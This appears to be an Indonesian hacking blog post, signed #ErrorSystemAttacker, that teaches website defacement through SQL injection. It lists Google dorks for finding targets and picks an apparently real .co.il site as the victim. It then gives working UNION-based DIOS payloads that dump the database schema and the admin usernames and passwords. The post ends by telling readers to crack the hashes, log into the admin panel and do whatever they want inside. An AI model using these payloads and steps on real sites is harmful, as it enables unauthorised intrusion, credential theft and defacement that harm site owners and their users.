- Deface Poc Sal Injection
- Assalamualaikum Wr. Wb. Pada kesempatan kali ini admin mau share sedikit materi tentang SQL Injection dengan DIOS (Dump In One Shot). Oke langsung aja ke materinya dibawah ini:
- ========================== #SQL Injection with DIOS Bahan - bahan: - Dork:
- inurl: index.php?id=
- inurl: details.php?id=
- inurl: product.php?id= (Kembangkan lagi) Langkah - langkah:
- 1. Dorking dulu digoogle menggunakan dork diatas
- 2. Pilih web target Contoh target mimin: http://www.situs.co.il/advertiser_view.php?id=77
- 3. Untuk mengetahui vuln atau tidak, tambahkan tanda petik ' di paling belakang url web Jadinya gini: http://www.situs.co.il/advertiser_view.php?id=77'
- 4. Kalo vuln makan akan muncul pesan error Contoh pesannya: _You have an error in SQL syntax_
- 5. Oke, selanjutnya kita mulai dump database nya Tambahkan perintah dibawah ini: +order+by+1--+-- Tambahkan dipaling belakang url web Jadinya gini: http://www.situs.co.il/advertiser_view.php?id=77+order+by+1--+- Dan lanjutkan angka 1 nya hingga menemukan pesan error kembali Di target mimin pesan errornya muncul diangka 6, berarti jumlah table dan columnya ada 5
- 6. Selanjutnya kita ganti perintah sebelumnya dengan perintah dibawah ini: +union+select+1,2,3,4,5--+- Tambahkan dipaling belakang url web Jadinya gini: http://www.situs.co.il/advertiser_view.php?id=77+union+select+1,2,3,4,5--+- Kenapa angkanya sampai 5? Karna tadi kan sebelumnya jumlah table dan columnya ada 5 6. Nah, setelah memasukkan perintah diatas maka akan muncul angka ajaib di halaman web tersebut Ditarget mimin angka ajaib nya adalah angka 2 dan 4. Tinggal kita pilih aja mau makai angka yg mana
- 7. Selanjutnya kita ganti perintah baru lagi dengan perintah dibawah ini: (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x) Masukkan perintah tersebut dinomer yg telah kita pilih Jadinya gini: http://www.situs.co.il/advertiser_view.php?id=77+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5--+- Maka akan keluar database web tersebut, untuk yg sebelah kanan adalah columnya dan untuk yg sebelah kiri adalah tablenya
- 8. Setelah itu kalian terserah mau cari apa di database tersebut, kalo mimin mau cari username sama password admin login web tersebut. Jadi ganti perintah sebelumnya dengan perintah dibawah ini: (/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM( *isi tablenya* )WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x, * isi columnya* ,0x203a3a20, *isi columnya* ,0x3c62723e))))x) Note: Untuk mengisi yg table, kalian sesuaikan dengan nama table yg ada di web tersebut. Dan untuk mengisi yg column juga sama sesuaikan dg nama column yg ada di web tersebut. Diweb target mimin table nya bernama users, sedangkan columnya bernama username dan password Jadi perintahnya seperti ini: (/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(users)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x) Masukkan perintah tersebut dinomer yg telah kita pilih Jadinya gini: http://www.situs.co.il/advertiser_view.php?id=77+union+select+1,(/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(users)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),3,4,5--+-
- 9. Nah, maka akan muncul username dan password web tersebut, namun biasanya passwordnya masih dalam bentuk acak, jadi kalian harus nge hash dulu passwordnya Note: Lihat jenis hash passwordnya, dia menggunakan jenis hash apa. Untuk jenis jenis hash nya bisa cari tau digoogle
- 10. Setelah password udah dihash, terakhir tinggal cari tempat admin loginnya (use brain) Klo udah ketemu tempat admin loginnya, tinggal masuk aja pake username dan password yg udah dihash tadi Dan klo udah berhasil masuk ke panel adminya, terserah kalian deh didalemnya mau ngapain hehe ============================== Done.
- Sekian sedikit materi dari mimin, kurang lebihnya mohon maaf. Gunakan dengan bijak, semoga bermanfaat Jika ada yg ditanyakan, silahkan bisa chat admin. Terima kasih :)
- #ErrorSystemAttacker
- #CyberSecurity
- #SqlInjection
- Wassalamualaikum Wr. Wb.
- Home
- No Label
- SQL Injection
SQL Injection
Related Post
Langganan:
Posting Komentar (Atom)
1 Comments: